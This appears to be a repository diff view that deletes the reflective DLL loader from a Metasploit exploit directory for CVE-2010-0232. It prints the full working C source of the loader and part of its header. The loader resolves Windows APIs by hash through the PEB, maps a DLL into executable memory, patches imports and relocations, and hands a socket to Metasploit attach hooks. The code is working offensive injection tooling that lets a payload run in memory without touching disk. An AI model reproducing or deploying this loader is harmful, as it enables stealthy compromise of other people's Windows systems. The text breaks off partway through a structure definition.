-	DWORD dwHashValue;
85
-
86
-	// variables for loading this image
87
-	ULONG_PTR uiHeaderValue;
88
-	ULONG_PTR uiValueA;
89
-	ULONG_PTR uiValueB;
90
-	ULONG_PTR uiValueC;
91
-	ULONG_PTR uiValueD;
92
-	ULONG_PTR uiValueE;
93
-
94
-	// STEP 0: calculate our images current base address
95
-
96
-	// we will start searching backwards from our callers return address.
97
-	uiLibraryAddress = caller();
98
-
99
-	// loop through memory backwards searching for our images base address
100
-	// we dont need SEH style search as we shouldnt generate any access violations with this
101
-	while( TRUE )
102
-	{
103
-		if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
104
-		{
105
-			uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
106
-			// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
107
-			// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
108
-			if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
109
-			{
110
-				uiHeaderValue += uiLibraryAddress;
111
-				// break if we have found a valid MZ/PE header
112
-				if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
113
-					break;
114
-			}
115
-		}
116
-		uiLibraryAddress--;
117
-	}
118
-
119
-	// STEP 1: process the kernels exports for the functions our loader needs...
120
-
121
-	// get the Process Enviroment Block
122
-#ifdef _WIN64
123
-	uiBaseAddress = __readgsqword( 0x60 );
124
-#else
125
-#ifdef WIN_ARM
126
-	uiBaseAddress = *(DWORD *)( (BYTE *)_MoveFromCoprocessor( 15, 0, 13, 0, 2 ) + 0x30 );
127
-#else _WIN32
128
-	uiBaseAddress = __readfsdword( 0x30 );
129
-#endif
130
-#endif
131
-
132
-	// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
133
-	uiBaseAddress = (ULONG_PTR)((_PPEB)uiBaseAddress)->pLdr;
134
-
135
-	// get the first entry of the InMemoryOrder module list
136
-	uiValueA = (ULONG_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
137
-	while( uiValueA )
138
-	{
139
-		// get pointer to current modules name (unicode string)
140
-		uiValueB = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
141
-		// set bCounter to the length for the loop
142
-		usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
143
-		// clear uiValueC which will store the hash of the module name
144
-		uiValueC = 0;
145
-
146
-		// compute the hash of the module name...
147
-		do
148
-		{
149
-			uiValueC = ror( (DWORD)uiValueC );
150
-			// normalize to uppercase if the module name is in lowercase
151
-			if( *((BYTE *)uiValueB) >= 'a' )
152
-				uiValueC += *((BYTE *)uiValueB) - 0x20;
153
-			else
154
-				uiValueC += *((BYTE *)uiValueB);
155
-			uiValueB++;
156
-		} while( --usCounter );
157
-
158
-		// compare the hash with that of kernel32.dll
159
-		if( (DWORD)uiValueC == KERNEL32DLL_HASH )
160
-		{
161
-			// get this modules base address
162
-			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
163
-
164
-			// get the VA of the modules NT Header
165
-			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
166
-
167
-			// uiNameArray = the address of the modules export directory entry
168
-			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
169
-
170
-			// get the VA of the export directory
171
-			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
172
-
173
-			// get the VA for the array of name pointers
174
-			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
175
-			
176
-			// get the VA for the array of name ordinals
177
-			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
178
-
179
-			usCounter = 3;
180
-#ifdef ENABLE_STOPPAGING
181
-			usCounter++;
182
-#endif
183
-#ifdef ENABLE_OUTPUTDEBUGSTRING
184
-			usCounter++;
185
-#endif
186
-
187
-			// loop while we still have imports to find
188
-			while( usCounter > 0 )
189
-			{
190
-				// compute the hash values for this function name
191
-				dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
192
-				
193
-				// if we have found a function we want we get its virtual address
194
-				if( dwHashValue == LOADLIBRARYA_HASH
195
-					|| dwHashValue == GETPROCADDRESS_HASH
196
-					|| dwHashValue == VIRTUALALLOC_HASH
197
-#ifdef ENABLE_STOPPAGING
198
-					|| dwHashValue == VIRTUALLOCK_HASH
199
-#endif
200
-#ifdef ENABLE_OUTPUTDEBUGSTRING
201
-					|| dwHashValue == OUTPUTDEBUG_HASH
202
-#endif
203
-					)
204
-				{
205
-					// get the VA for the array of addresses
206
-					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
207
-
208
-					// use this functions name ordinal as an index into the array of name pointers
209
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
210
-
211
-					// store this functions VA
212
-					if( dwHashValue == LOADLIBRARYA_HASH )
213
-						pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
214
-					else if( dwHashValue == GETPROCADDRESS_HASH )
215
-						pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
216
-					else if( dwHashValue == VIRTUALALLOC_HASH )
217
-						pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
218
-#ifdef ENABLE_STOPPAGING
219
-					else if( dwHashValue == VIRTUALLOCK_HASH )
220
-						pVirtualLock = (VIRTUALLOCK)( uiBaseAddress + DEREF_32( uiAddressArray ) );
221
-#endif
222
-#ifdef ENABLE_OUTPUTDEBUGSTRING
223
-					else if( dwHashValue == OUTPUTDEBUG_HASH )
224
-						pOutputDebug = (OUTPUTDEBUG)( uiBaseAddress + DEREF_32( uiAddressArray ) );
225
-#endif
226
-			
227
-					// decrement our counter
228
-					usCounter--;
229
-				}
230
-
231
-				// get the next exported function name
232
-				uiNameArray += sizeof(DWORD);
233
-
234
-				// get the next exported function name ordinal
235
-				uiNameOrdinals += sizeof(WORD);
236
-			}
237
-		}
238
-		else if( (DWORD)uiValueC == NTDLLDLL_HASH )
239
-		{
240
-			// get this modules base address
241
-			uiBaseAddress = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
242
-
243
-			// get the VA of the modules NT Header
244
-			uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
245
-
246
-			// uiNameArray = the address of the modules export directory entry
247
-			uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
248
-
249
-			// get the VA of the export directory
250
-			uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
251
-
252
-			// get the VA for the array of name pointers
253
-			uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
254
-			
255
-			// get the VA for the array of name ordinals
256
-			uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
257
-
258
-			usCounter = 1;
259
-
260
-			// loop while we still have imports to find
261
-			while( usCounter > 0 )
262
-			{
263
-				// compute the hash values for this function name
264
-				dwHashValue = _hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) )  );
265
-				
266
-				// if we have found a function we want we get its virtual address
267
-				if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
268
-				{
269
-					// get the VA for the array of addresses
270
-					uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
271
-
272
-					// use this functions name ordinal as an index into the array of name pointers
273
-					uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
274
-
275
-					// store this functions VA
276
-					if( dwHashValue == NTFLUSHINSTRUCTIONCACHE_HASH )
277
-						pNtFlushInstructionCache = (NTFLUSHINSTRUCTIONCACHE)( uiBaseAddress + DEREF_32( uiAddressArray ) );
278
-
279
-					// decrement our counter
280
-					usCounter--;
281
-				}
282
-
283
-				// get the next exported function name
284
-				uiNameArray += sizeof(DWORD);
285
-
286
-				// get the next exported function name ordinal
287
-				uiNameOrdinals += sizeof(WORD);
288
-			}
289
-		}
290
-
291
-		// we stop searching when we have found everything we need.
292
-		if( pLoadLibraryA
293
-			&& pGetProcAddress
294
-			&& pVirtualAlloc
295
-#ifdef ENABLE_STOPPAGING
296
-			&& pVirtualLock
297
-#endif
298
-			&& pNtFlushInstructionCache
299
-#ifdef ENABLE_OUTPUTDEBUGSTRING
300
-			&& pOutputDebug
301
-#endif
302
-			)
303
-			break;
304
-
305
-		// get the next entry
306
-		uiValueA = DEREF( uiValueA );
307
-	}
308
-
309
-	// STEP 2: load our image into a new permanent location in memory...
310
-
311
-	// get the VA of the NT Header for the PE to be loaded
312
-	uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
313
-
314
-	// allocate all the memory for the DLL to be loaded into. we can load at any address because we will  
315
-	// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
316
-	uiBaseAddress = (ULONG_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
317
-
318
-#ifdef ENABLE_STOPPAGING
319
-	// prevent our image from being swapped to the pagefile
320
-	pVirtualLock((LPVOID)uiBaseAddress, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage);
321
-#endif
322
-
323
-	// we must now copy over the headers
324
-	uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
325
-	uiValueB = uiLibraryAddress;
326
-	uiValueC = uiBaseAddress;
327
-
328
-	while( uiValueA-- )
329
-		*(BYTE *)uiValueC++ = *(BYTE *)uiValueB++;
330
-
331
-	// STEP 3: load in all of our sections...
332
-
333
-	// uiValueA = the VA of the first section
334
-	uiValueA = ( (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
335
-	
336
-	// itterate through all sections, loading them into memory.
337
-	uiValueE = ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections;
338
-	while( uiValueE-- )
339
-	{
340
-		// uiValueB is the VA for this section
341
-		uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
342
-
343
-		// uiValueC if the VA for this sections data
344
-		uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
345
-
346
-		// copy the section over
347
-		uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
348
-
349
-		while( uiValueD-- )
350
-			*(BYTE *)uiValueB++ = *(BYTE *)uiValueC++;
351
-
352
-		// get the VA of the next section
353
-		uiValueA += sizeof( IMAGE_SECTION_HEADER );
354
-	}
355
-
356
-	// STEP 4: process our images import table...
357
-
358
-	// uiValueB = the address of the import directory
359
-	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
360
-	
361
-	// we assume there is an import table to process
362
-	// uiValueC is the first entry in the import table
363
-	uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
364
-	
365
-	// iterate through all imports until a null RVA is found (Characteristics is mis-named)
366
-	while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Characteristics )
367
-	{
368
-		OUTPUTDBG("Loading library: ");
369
-		OUTPUTDBG((LPCSTR)(uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name));
370
-		OUTPUTDBG("\n");
371
-
372
-		// use LoadLibraryA to load the imported module into memory
373
-		uiLibraryAddress = (ULONG_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
374
-
375
-		if ( !uiLibraryAddress )
376
-		{
377
-			OUTPUTDBG("Loading library FAILED\n");
378
-
379
-			uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
380
-			continue;
381
-		}
382
-
383
-		// uiValueD = VA of the OriginalFirstThunk
384
-		uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
385
-	
386
-		// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
387
-		uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
388
-
389
-		// itterate through all imported functions, importing by ordinal if no name present
390
-		while( DEREF(uiValueA) )
391
-		{
392
-			// sanity check uiValueD as some compilers only import by FirstThunk
393
-			if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
394
-			{
395
-				// get the VA of the modules NT Header
396
-				uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
397
-
398
-				// uiNameArray = the address of the modules export directory entry
399
-				uiNameArray = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
400
-
401
-				// get the VA of the export directory
402
-				uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
403
-
404
-				// get the VA for the array of addresses
405
-				uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
406
-
407
-				// use the import ordinal (- export ordinal base) as an index into the array of addresses
408
-				uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
409
-
410
-				// patch in the address for this imported function
411
-				DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
412
-			}
413
-			else
414
-			{
415
-				// get the VA of this functions import by name struct
416
-				uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
417
-
418
-				OUTPUTDBG("Resolving function: ");
419
-				OUTPUTDBG(((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name);
420
-				OUTPUTDBG("\n");
421
-
422
-				// use GetProcAddress and patch in the address for this imported function
423
-				DEREF(uiValueA) = (ULONG_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
424
-			}
425
-			// get the next imported function
426
-			uiValueA += sizeof( ULONG_PTR );
427
-			if( uiValueD )
428
-				uiValueD += sizeof( ULONG_PTR );
429
-		}
430
-
431
-		// get the next import
432
-		uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
433
-	}
434
-
435
-	// STEP 5: process all of our images relocations...
436
-
437
-	// calculate the base address delta and perform relocations (even if we load at desired image base)
438
-	uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
439
-
440
-	// uiValueB = the address of the relocation directory
441
-	uiValueB = (ULONG_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
442
-
443
-	// check if their are any relocations present
444
-	if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
445
-	{
446
-		// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
447
-		uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
448
-
449
-		// and we itterate through all entries...
450
-		while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
451
-		{
452
-			// uiValueA = the VA for this relocation block
453
-			uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
454
-
455
-			// uiValueB = number of entries in this relocation block
456
-			uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
457
-
458
-			// uiValueD is now the first entry in the current relocation block
459
-			uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
460
-
461
-			// we itterate through all the entries in the current block...
462
-			while( uiValueB-- )
463
-			{
464
-				// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
465
-				// we dont use a switch statement to avoid the compiler building a jump table
466
-				// which would not be very position independent!
467
-				if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
468
-					*(ULONG_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
469
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
470
-					*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
471
-#ifdef WIN_ARM
472
-				// Note: On ARM, the compiler optimization /O2 seems to introduce an off by one issue, possibly a code gen bug. Using /O1 instead avoids this problem.
473
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_ARM_MOV32T )
474
-				{	
475
-					register DWORD dwInstruction;
476
-					register DWORD dwAddress;
477
-					register WORD wImm;
478
-					// get the MOV.T instructions DWORD value (We add 4 to the offset to go past the first MOV.W which handles the low word)
479
-					dwInstruction = *(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) );
480
-					// flip the words to get the instruction as expected
481
-					dwInstruction = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
482
-					// sanity chack we are processing a MOV instruction...
483
-					if( (dwInstruction & ARM_MOV_MASK) == ARM_MOVT )
484
-					{
485
-						// pull out the encoded 16bit value (the high portion of the address-to-relocate)
486
-						wImm  = (WORD)( dwInstruction & 0x000000FF);
487
-						wImm |= (WORD)((dwInstruction & 0x00007000) >> 4);
488
-						wImm |= (WORD)((dwInstruction & 0x04000000) >> 15);
489
-						wImm |= (WORD)((dwInstruction & 0x000F0000) >> 4);
490
-						// apply the relocation to the target address
491
-						dwAddress = ( (WORD)HIWORD(uiLibraryAddress) + wImm ) & 0xFFFF;
492
-						// now create a new instruction with the same opcode and register param.
493
-						dwInstruction  = (DWORD)( dwInstruction & ARM_MOV_MASK2 );
494
-						// patch in the relocated address...
495
-						dwInstruction |= (DWORD)(dwAddress & 0x00FF);
496
-						dwInstruction |= (DWORD)(dwAddress & 0x0700) << 4;
497
-						dwInstruction |= (DWORD)(dwAddress & 0x0800) << 15;
498
-						dwInstruction |= (DWORD)(dwAddress & 0xF000) << 4;
499
-						// now flip the instructions words and patch back into the code...
500
-						*(DWORD *)( uiValueA + ((PIMAGE_RELOC)uiValueD)->offset + sizeof(DWORD) ) = MAKELONG( HIWORD(dwInstruction), LOWORD(dwInstruction) );
501
-					}
502
-				}
503
-#endif
504
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
505
-					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
506
-				else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
507
-					*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
508
-
509
-				// get the next entry in the current relocation block
510
-				uiValueD += sizeof( IMAGE_RELOC );
511
-			}
512
-
513
-			// get the next entry in the relocation directory
514
-			uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
515
-		}
516
-	}
517
-
518
-	// STEP 6: call our images entry point
519
-
520
-	// uiValueA = the VA of our newly loaded DLL/EXE's entry point
521
-	uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
522
-
523
-	OUTPUTDBG("Flushing the instruction cache");
524
-	// We must flush the instruction cache to avoid stale code being used which was updated by our relocation processing.
525
-	pNtFlushInstructionCache( (HANDLE)-1, NULL, 0 );
526
-
527
-	// call our respective entry point, fudging our hInstance value
528
-#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
529
-	// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
530
-	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
531
-#else
532
-	// if we are injecting an DLL via a stub we call DllMain with no parameter
533
-	((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
534
-#endif
535
-
536
-	// STEP 8: return our new entry point address so whatever called us can call DllMain() if needed.
537
-	return uiValueA;
538
-}
539
-//===============================================================================================//
540
-#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
541
-
542
-// you must implement this function...
543
-extern DWORD DLLEXPORT Init( SOCKET socket );
544
-
545
-BOOL MetasploitDllAttach( SOCKET socket )
546
-{
547
-	Init( socket );
548
-	return TRUE;
549
-}
550
-
551
-BOOL MetasploitDllDetach( DWORD dwExitFunc )
552
-{
553
-	switch( dwExitFunc )
554
-	{
555
-		case EXITFUNC_SEH:
556
-			SetUnhandledExceptionFilter( NULL );
557
-			break;
558
-		case EXITFUNC_THREAD:
559
-			ExitThread( 0 );
560
-			break;
561
-		case EXITFUNC_PROCESS:
562
-			ExitProcess( 0 );
563
-			break;
564
-		default:
565
-			break;
566
-	}
567
-
568
-	return TRUE;
569
-}
570
-
571
-BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
572
-{
573
-    BOOL bReturnValue = TRUE;
574
-
575
-	switch( dwReason ) 
576
-    { 
577
-		case DLL_METASPLOIT_ATTACH:
578
-			bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
579
-			break;
580
-		case DLL_METASPLOIT_DETACH:
581
-			bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
582
-			break;
583
-		case DLL_QUERY_HMODULE:
584
-			if( lpReserved != NULL )
585
-				*(HMODULE *)lpReserved = hAppInstance;
586
-			break;
587
-		case DLL_PROCESS_ATTACH:
588
-			hAppInstance = hinstDLL;
589
-			break;
590
-		case DLL_PROCESS_DETACH:
591
-		case DLL_THREAD_ATTACH:
592
-		case DLL_THREAD_DETACH:
593
-            break;
594
-    }
595
-	return bReturnValue;
596
-}
597
-
598
-#endif
599
-//===============================================================================================//

+ 0
- 223
external/source/exploits/CVE-2010-0232/common/ReflectiveLoader.h View File

@@ -1,223 +0,0 @@
1
-//===============================================================================================//
2
-// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3
-// All rights reserved.
4
-// 
5
-// Redistribution and use in source and binary forms, with or without modification, are permitted 
6
-// provided that the following conditions are met:
7
-// 
8
-//     * Redistributions of source code must retain the above copyright notice, this list of 
9
-// conditions and the following disclaimer.
10
-// 
11
-//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
12
-// conditions and the following disclaimer in the documentation and/or other materials provided 
13
-// with the distribution.
14
-// 
15
-//     * Neither the name of Harmony Security nor the names of its contributors may be used to
16
-// endorse or promote products derived from this software without specific prior written permission.
17
-// 
18
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
19
-// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20
-// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
21
-// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
22
-// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
23
-// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
24
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
25
-// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
26
-// POSSIBILITY OF SUCH DAMAGE.
27
-//===============================================================================================//
28
-#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
29
-#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H
30
-//===============================================================================================//
31
-#define WIN32_LEAN_AND_MEAN
32
-#include <windows.h>
33
-#include <Winsock2.h>
34
-#include <intrin.h>
35
-
36
-#include "ReflectiveDLLInjection.h"
37
-
38
-// Enable this define to turn on OutputDebugString support
39
-//#define ENABLE_OUTPUTDEBUGSTRING 1
40
-
41
-// Enable this define to turn on locking of memory to prevent paging
42
-#define ENABLE_STOPPAGING 1
43
-
44
-#define EXITFUNC_SEH		0xEA320EFE
45
-#define EXITFUNC_THREAD		0x0A2A1DE0
46
-#define EXITFUNC_PROCESS	0x56A2B5F0
47
-
48
-typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
49
-typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
50
-typedef LPVOID  (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
51
-typedef DWORD  (NTAPI * NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG );
52
-
53
-#define KERNEL32DLL_HASH				0x6A4ABC5B
54
-#define NTDLLDLL_HASH					0x3CFA685D
55
-
56
-#define LOADLIBRARYA_HASH				0xEC0E4E8E
57
-#define GETPROCADDRESS_HASH				0x7C0DFCAA
58
-#define VIRTUALALLOC_HASH				0x91AFCA54
59
-#define NTFLUSHINSTRUCTIONCACHE_HASH	0x534C0AB8
60
-
61
-#ifdef ENABLE_STOPPAGING
62
-typedef LPVOID  (WINAPI * VIRTUALLOCK)( LPVOID, SIZE_T );
63
-#define VIRTUALLOCK_HASH				0x0EF632F2
64
-#endif
65
-
66
-#ifdef ENABLE_OUTPUTDEBUGSTRING
67
-typedef LPVOID  (WINAPI * OUTPUTDEBUG)( LPCSTR );
68
-#define OUTPUTDEBUG_HASH				0x470D22BC
69
-#endif
70
-
71
-#define IMAGE_REL_BASED_ARM_MOV32A		5
72
-#define IMAGE_REL_BASED_ARM_MOV32T		7
73
-
74
-#define ARM_MOV_MASK					(DWORD)(0xFBF08000)
75
-#define ARM_MOV_MASK2					(DWORD)(0xFBF08F00)
76
-#define ARM_MOVW						0xF2400000
77
-#define ARM_MOVT						0xF2C00000
78
-
79
-#define HASH_KEY						13
80
-//===============================================================================================//
81
-#pragma intrinsic( _rotr )
82
-
83
-__forceinline DWORD ror( DWORD d )
84
-{
85
-	return _rotr( d, HASH_KEY );
86
-}
87
-
88
-__forceinline DWORD _hash( char * c )
89
-{
90
-    register DWORD h = 0;
91
-	do
92
-	{
93
-		h = ror( h );
94
-        h += *c;
95
-	} while( *++c );
96
-
97
-    return h;
98
-}
99
-//===============================================================================================//
100
-typedef struct _UNICODE_STR
101
-{
102
-  USHORT Length;
103
-  USHORT MaximumLength;
104
-  PWSTR pBuffer;
105
-} UNICODE_STR, *PUNICODE_STR;
106
-
107
-// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
108
-//__declspec( align(8) ) 
109
-typedef struct _LDR_DATA_TABLE_ENTRY
110
-{
111
-	//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
112
-	LIST_ENTRY InMemoryOrderModuleList;
113
-	LIST_ENTRY InInitializationOrderModuleList;
114
-	PVOID DllBase;
115
-	PVOID EntryPoint;
116
-	ULONG SizeOfImage;
117
-	UNICODE_STR FullDllName;
118
-	UNICODE_STR BaseDllName;
119
-	ULONG Flags;
120
-	SHORT LoadCount;
121
-	SHORT TlsIndex;
122
-	LIST_ENTRY HashTableEntry;
123
-	ULONG TimeDateStamp;
124
-} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
125
-
126
-// WinDbg> dt -v ntdll!_PEB_LDR_DATA
127
-typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
128
-{
129
-   DWORD dwLength;
130
-   DWORD dwInitialized;
131
-   LPVOID lpSsHandle;
132
-   LIST_ENTRY InLoadOrderModuleList;
133
-   LIST_ENTRY InMemoryOrderModuleList;
134
-   LIST_ENTRY InInitializationOrderModuleList;
135
